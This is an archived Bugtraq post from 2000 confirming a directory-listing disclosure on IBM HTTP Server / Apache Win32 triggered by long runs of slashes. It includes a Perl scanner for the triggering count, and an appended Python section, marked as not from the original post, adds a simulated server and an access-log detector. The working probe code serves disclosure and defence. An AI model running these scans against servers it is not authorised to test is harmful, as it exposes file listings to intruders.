[15148] in bugtraq
Re: IBM HTTP SERVER / APACHE
daemon@ATHENA.MIT.EDU (H D Moore)
Thu Jun 1 21:05:20 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <393678B6.ACE4029@secureaustin.com>
Date: Thu, 1 Jun 2000 09:52:38 -0500
Reply-To: H D Moore <hdm@SECUREAUSTIN.COM>
From: H D Moore <hdm@SECUREAUSTIN.COM>
X-To: Marek Roy <marek_roy@HOTMAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Hi,
I verified this on IBM_HTTP_SERVER/1.3.3 Apache/1.3.4-dev (Win32). The
number of /'s needed was exactly the same number as Marek stated in his
original email (211 being the key number to retrieve an index listing).
Appended is an example Perl script for finding _your_ magic number. Is
this a bug merely in IBM HTTPD or Apache Win32 in general? Does IBM set
some odd compile flag which triggers this bug in their version? Anyone
from the Apache group care to comment?
-HD
http://www.secureaustin.com (spidermap/nlog/etc)
Marek Roy wrote:
>
> I haven't seen any advisories for IBM HTTP SERVER running
> Apache.
>
[ snip ]
> The number of "/" used to reproduce this can be different
> from one server to another. I don't have enough time to do
> more testing. However, feel free to add some more info to
> this quick advisory.
----[ sample scan script to find / offset ]---- (OMG it's PERL ;)
#!/usr/bin/perl
# Fetch "/" once as a baseline, then request "//", "///", ... and stop at
# the first path whose response differs (e.g. an index listing appears).
use strict;
use LWP::Simple;

my $host = shift() || die "usage: $0 [hostname]\n";
my $odata;    # baseline body for "/"
my $data;     # body for "/" x $i
my $i;

$odata = get("http://$host/");
if (!defined($odata) || $odata eq "")
{
    die "no response from server: $host\n";
}

for ($i = 2; $i < 4096; $i++)
{
    print "Trying $i...\n";
    $data = get("http://$host" . ("/" x $i));
    # LWP::Simple::get returns undef on a failed request; skip those
    next unless defined($data);
    if ($data ne $odata)
    {
        print "/ = $i\n\n$data\n\n";
        exit;
    }
}
print "no change in response up to 4096 slashes\n";
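The same baseline-diff scan in Python, with an access-log check for the request pattern on the other side. This is an added example, not the script from the post or any IBM/Apache code: the simulated server is a constructed stand-in that flips to a listing at 211 slashes (the number quoted in the thread), the listing text and the sample log lines are made up, and the four-slash alert threshold is an assumption.

```python
import http.client
import re

def find_slash_offset(fetch, max_slashes=4096):
    """Linear scan as in the Perl script: fetch "/" as a baseline, then
    "//", "///", ... and stop at the first body that differs.
    `fetch(path)` returns the body as str, or None on a failed request.
    Returns (n, body) for the first change, or None if nothing changed."""
    baseline = fetch("/")
    if not baseline:
        raise RuntimeError("no response for baseline request")
    for n in range(2, max_slashes):
        body = fetch("/" * n)
        if body is not None and body != baseline:
            return n, body
    return None

def make_http_fetch(host, port=80, timeout=5):
    """Fetcher for a live host (not exercised offline). http.client sends
    the request path verbatim, so the slash run reaches the server intact."""
    def fetch(path):
        try:
            conn = http.client.HTTPConnection(host, port, timeout=timeout)
            conn.request("GET", path, headers={"Host": host})
            body = conn.getresponse().read().decode("latin-1")
            conn.close()
            return body
        except OSError:
            return None
    return fetch

# Constructed stand-in for the server behaviour described in the thread:
# normal root document until the path is a run of at least 211 slashes.
# The threshold is the thread's number; the listing text is invented.
def simulated_ibm_httpd(path):
    if path.count("/") == len(path) and len(path) >= 211:
        return "<title>Index of /</title><a href=\"cgi-bin/\">cgi-bin/</a>"
    return "<html><body>Welcome to the IBM HTTP Server</body></html>"

# Defender side: flag requests whose path contains a long run of slashes.
# Apache common/combined log format; the path is the second token of the
# request line and contains no whitespace.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3})'
)

def suspicious_slash_requests(lines, min_run=4):
    """Return (client_ip, longest_slash_run, status) for every log line whose
    request path has a run of at least min_run consecutive slashes."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        run = max((len(r) for r in re.findall(r"/+", m["path"])), default=0)
        if run >= min_run:
            hits.append((m["ip"], run, int(m["status"])))
    return hits

# Constructed sample log lines: one baseline hit, two probe requests, one
# ordinary request from another client.
SAMPLE_LOG = (
    '10.0.0.5 - - [01/Jun/2000:09:52:38 -0500] "GET / HTTP/1.0" 200 1452 "-" "libwww-perl/5.47"\n'
    '10.0.0.5 - - [01/Jun/2000:09:52:39 -0500] "GET //////////// HTTP/1.0" 200 1452 "-" "libwww-perl/5.47"\n'
    '10.0.0.5 - - [01/Jun/2000:09:52:40 -0500] "GET ' + "/" * 211 + ' HTTP/1.0" 200 8831 "-" "libwww-perl/5.47"\n'
    '192.0.2.9 - - [01/Jun/2000:10:00:00 -0500] "GET /docs/index.html HTTP/1.0" 200 512 "-" "Mozilla/4.0"\n'
)

if __name__ == "__main__":
    # Offline run against the simulated server; swap in
    # make_http_fetch("target.example") to probe a real host.
    result = find_slash_offset(simulated_ibm_httpd)
    print("offset:", result[0] if result else None)
    for ip, run, status in suspicious_slash_requests(SAMPLE_LOG.splitlines()):
        print(f"{ip} sent a {run}-slash path, status {status}")
```

Requests a scanner makes are easy to spot in the log because a legitimate URL almost never carries more than a couple of consecutive slashes; on the probing side, note that the script compares whole bodies, so a server that injects per-request content (a timestamp, a session id) will report a change at n=2 and the comparison has to be narrowed to the part of the page that is stable.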